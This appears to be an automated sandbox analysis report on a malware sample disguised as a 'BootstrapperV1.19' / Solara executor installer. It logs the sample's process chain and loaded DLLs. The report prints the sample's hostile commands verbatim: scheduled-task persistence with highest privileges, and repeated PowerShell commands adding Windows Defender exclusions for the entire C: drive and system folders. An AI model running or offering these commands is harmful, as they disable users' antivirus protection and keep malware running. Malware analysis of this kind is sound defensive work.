File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\BootstrapperV1.19.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: xqMwd6mr9g.81.dr, Vps7PmWDVK.81.dr, 5MLHhxw7wR.81.dr, YVdYBu0uoY.81.dr, yrXh7kZTCk.81.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: BootstrapperV1.19.exe	Virustotal: Detection: 87%
Source: BootstrapperV1.19.exe	ReversingLabs: Detection: 94%

Source: BootstrapperV1.19.exe	String found in binary or memory: --START ERROR INFO--
Source: BootstrapperV1.19.exe	String found in binary or memory: chttps://go.microsoft.com/fwlink/p/?LinkId=2124703=MicrosoftEdgeWebview2Setup.exe!/silent /installQWebView2 runtime installed successfully.GError installing WebView2 runtime: iSOFTWARE\Microsoft\VisualStudio\14.0\VC\Runtimes\X64
Source: BootstrapperV1.19.exe	String found in binary or memory: Installed#vc_redist.x64.exe5/install /quiet /norestart
Source: BootstrapperV1.19.exe	String found in binary or memory: .aiff.airwapplication/vnd.adobe.air-application-installer-package+zip

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe

File read: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\BootstrapperV1.19.exe "C:\Users\user\Desktop\BootstrapperV1.19.exe"
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Process created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe "C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe"
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Process created: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe "C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe"
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe"
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7152 -s 2180
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5sOqbfN.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe"
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ELAMBKUP\SIHClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\RuntimeBroker.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OQZC6ToBZn.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: unknown	Process created: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
Source: unknown	Process created: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe "C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe"
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Process created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe "C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe"	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Process created: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe "C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5sOqbfN.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ELAMBKUP\SIHClient.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\RuntimeBroker.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OQZC6ToBZn.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe "C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe"

Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: wintypes.dll	Jump to behavior
